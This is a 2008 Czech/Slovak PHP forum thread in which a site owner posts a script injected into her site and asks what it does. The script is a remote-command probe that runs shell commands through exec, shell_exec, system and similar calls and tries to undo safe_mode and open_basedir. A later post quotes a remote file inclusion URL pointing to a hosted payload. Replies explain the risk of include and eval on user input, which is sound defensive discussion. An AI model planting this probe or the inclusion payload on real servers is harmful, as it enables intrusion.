Čo urobí script – PHP – Fórum – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu
Reklama
Reklama

Čo urobí script – PHP – Fórum – Programujte.comČo urobí script – PHP – Fórum – Programujte.com

 

Hledá se programátor! Plat 1 800 € + bonusy (firma Boxmol.com)
ebeš0
Duch
26. 6. 2008   #1
-
0
-

Môže mi prosím niekto napísať, čo urobí tento script



/\/\/\ Response CMD /\/\/\Changing this CMD will result in corrupt scanning !
<?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : "); echo("SafemodeOFF"); } else{
ini_restore("safe_mode"); ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){ echo("Safe
Mode of this Server is : "); echo("SafemodeOFF"); }else{ echo("Safe Mode of this
Server is : "); echo("SafemodeON"); } } function ex($cfe){ $res = ''; if
(!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res =
join("\n",$res); } elseif(function_exists('shell_exec')){ $res =
@shell_exec($cfe); } elseif(function_exists('system')){ @ob_start();
@system($cfe); $res = @ob_get_contents(); @ob_end_clean(); }
elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res =
@ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f =
@popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f); } } return $res; } exit;


ďakujem

Nahlásit jako SPAM
IP: 78.98.162.–
Reklama
Reklama
26. 6. 2008   #2
-
0
-

Lol das sem zpraseny kod a myslis si ze ho bude nekdo lustit?

Nahlásit jako SPAM
IP: 81.30.238.–
Prosím, jestli potřebujete s něčím poradit,zeptejte se na fóru. Jakýkoliv bezdůvodný pokus mě kontaktovat skončí okamžitým přidáním do ignore listu![br][br] Současný počet osob, které to nepochopily: 7
pawlik0
Grafoman
26. 6. 2008   #3
-
0
-

To ebeš : kdes ho vzal?

Nahlásit jako SPAM
IP: 195.113.87.–
Sa Nata A Na. Howgh
survik1
~ Moderátor
0
Posthunter
26. 6. 2008   #4
-
0
-

Netuším k čemu to slouží, nicméně přikládám kód v upravené formě.



/\/\/\ Response CMD /\/\/\Changing this CMD will result in corrupt scanning !

<?php

function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res); $res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean(); }
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents(); @ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}

if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else
{
ini_restore("safe_mode"); ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start"))))
{
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else
{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
?>

Nahlásit jako SPAM
IP: 89.102.163.–
Život je jen hra, která se nedá vyhrát.
ebeš0
Duch
26. 6. 2008   #5
-
0
-

To sa mi niekto snaží vložiť na stránku.
Mne to nič nehovorí, tak som chcela len skúsiť, či to niekto nepozná

Nahlásit jako SPAM
IP: 78.98.162.–
survik1
~ Moderátor
0
Posthunter
26. 6. 2008   #6
-
0
-

Tak ještě ten link, kde se to nachází:
http://www.theopensourcerer.com/2007/12/20/is-this-a-hackers-tool/

Nahlásit jako SPAM
IP: 89.102.163.–
Život je jen hra, která se nedá vyhrát.
26. 6. 2008   #7
-
0
-

No zda se ze to scanuje jestli je aktivovany safemode a daji se provadet prikazy pres prikazovou radku. Samo o sobe to nic nedela, jen to dotycnemu poskytuje informace o serveru.

Nahlásit jako SPAM
IP: 81.30.238.–
Prosím, jestli potřebujete s něčím poradit,zeptejte se na fóru. Jakýkoliv bezdůvodný pokus mě kontaktovat skončí okamžitým přidáním do ignore listu![br][br] Současný počet osob, které to nepochopily: 7
ebeš0
Duch
26. 6. 2008   #8
-
0
-

K čomu sú niekomu dobré údaje o serveri?
Nemôže si tymto spôsobom niečo zisťovať provider?
Našla som ešte jeden script, ktory si tiež niečo zisťoval o serveri

Nahlásit jako SPAM
IP: 78.98.162.–
26. 6. 2008   #9
-
0
-

Pokud tam muze nahrat tohle, tak tam muze nahrat i cokoliv jineho.

A provider tyhle informaci vi, ten si je nepotrbuje zjistovat.

Nahlásit jako SPAM
IP: 81.30.238.–
Prosím, jestli potřebujete s něčím poradit,zeptejte se na fóru. Jakýkoliv bezdůvodný pokus mě kontaktovat skončí okamžitým přidáním do ignore listu![br][br] Současný počet osob, které to nepochopily: 7
ebeš0
Duch
26. 6. 2008   #10
-
0
-

Nie som v tom moc zbehla
Poznam php, mysql injection, XSS utoky
Snažím sa pred nimi stránku zabezpečiť,ale asi mi stále niečo uniká
Sledujem kto, kedy, z kade ide na stránku. Občas tam najdem takéto zvláštnosti, ale nedokážem pochopiť,ako to pracuje
URL mojej main stránky je www.domena.sk/index.php?strana = main
Čo sa deje, keď zadám do prehliadača
www.domena.sk/index.php?stranka=http://www.iglesialcs.cl/newweb/cache/arab.txt??
a zobrazí sa tam moja main strana
a na adrese http://www.iglesialcs.cl/newweb/cache/arab.txt?? je už hore popísaný script ?

Nahlásit jako SPAM
IP: 78.98.162.–
26. 6. 2008   #11
-
0
-

Ten skript se spusti za predpokladu, ze tam mas bud include nebo eval. Obe tyto funkce jsouvelice nebezpecne v kombinaci s uzivatelskym vstupem. Vzdy musis kontrolovat, co includujes nebo evalujes, jinak to proste nejde a pak si s tvou trankou muze kdokoliv delat co chce.

Nahlásit jako SPAM
IP: 81.30.238.–
Prosím, jestli potřebujete s něčím poradit,zeptejte se na fóru. Jakýkoliv bezdůvodný pokus mě kontaktovat skončí okamžitým přidáním do ignore listu![br][br] Současný počet osob, které to nepochopily: 7
ebeš0
Duch
27. 6. 2008   #12
-
0
-

Ďakujem za trpezlivosť.
Takže, keďže sa zobrazila moja stránka a nie vysledok scriptu, utok sa nepodaril?
Nemám include ani eval.Zobrazenie mám riešené cez funkcie a výstup z databázy mám tiež ošetrený.

Nahlásit jako SPAM
IP: 78.98.162.–
Zjistit počet nových příspěvků

Přidej příspěvek

Toto téma je starší jak čtvrt roku – přidej svůj příspěvek jen tehdy, máš-li k tématu opravdu co říct!

Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku

×Vložení zdrojáku

×Vložení obrázku

Vložit URL obrázku Vybrat obrázek na disku
Vlož URL adresu obrázku:
Klikni a vyber obrázek z počítače:

×Vložení videa

Aktuálně jsou podporována videa ze serverů YouTube, Vimeo a Dailymotion.
×
 
Podporujeme Gravatara.
Zadej URL adresu Avatara (40 x 40 px) nebo emailovou adresu pro použití Gravatara.
Email nikam neukládáme, po získání Gravatara je zahozen.
-
Pravidla pro psaní příspěvků, používej diakritiku. ENTER pro nový odstavec, SHIFT + ENTER pro nový řádek.
Sledovat nové příspěvky (pouze pro přihlášené)
Sleduj vlákno a v případě přidání nového příspěvku o tom budeš vědět mezi prvními.
Reaguješ na příspěvek:

Uživatelé prohlížející si toto vlákno

Uživatelé on-line: 0 registrovaných, 64 hostů

Podobná vlákna

Script — založil papajohn

Script-Mysql — založil Václav Žitek

Script v luc — založil lololol

Action Script 3 — založil Majox

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032016 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý